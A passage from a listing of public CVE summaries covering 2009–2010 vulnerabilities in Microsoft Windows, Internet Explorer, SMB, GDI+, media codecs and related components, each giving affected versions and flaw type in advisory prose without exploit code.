Codec Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0805] The Tabular Data Control (TDC) ActiveX control in Microsoft Internet Explorer 5.01 SP4, 6 on Windows XP SP2 and SP3, and 6 SP1 allows remote attackers to execute arbitrary code via a long URL (DataURL parameter) that triggers memory corruption in the CTDCCtl::SecurityCHeckDataURL function, aka "Memory Corruption Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0379] Multiple unspecified vulnerabilities in the Macromedia Flash ActiveX control in Adobe Flash Player 6, as distributed in Microsoft Windows XP SP2 and SP3, might allow remote attackers to execute arbitrary code via unspecified vectors that are not related to the use-after-free "Movie Unloading Vulnerability" (CVE-2010-0378). NOTE: due to lack of details, it is not clear whether this overlaps any other CVE item. [CVE-2010-0378] Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0035] The Key Distribution Center (KDC) in Kerberos in Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2, when a trust relationship with a non-Windows Kerberos realm exists, allows remote authenticated users to cause a denial of service (NULL pointer dereference and domain controller outage) via a crafted Ticket Granting Ticket (TGT) renewal request, aka "Kerberos Null Pointer Dereference Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3294] The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen function in the Microsoft C runtime library. NOTE: this might not cross privilege boundaries except in rare cases in which the mode argument is accessible to an attacker outside of an application that uses the popen function. [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-3019] Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute. [CVE-2009-2764] Microsoft Internet Explorer 8.0.7100.0 on Windows 7 RC on the x64 platform allows remote attackers to cause a denial of service (application crash) via a certain DIV element in conjunction with SCRIPT elements that have empty contents and no reference to a valid external script location. [CVE-2009-2655] mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2527] Heap-based buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via (1) a crafted ASF file or (2) crafted streaming content, aka "WMP Heap Overflow Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2525] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly initialize unspecified functions within compressed audio files, which allows remote attackers to execute arbitrary code via (1) a crafted media file or (2) crafted streaming content, aka "Windows Media Runtime Heap Corruption Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP 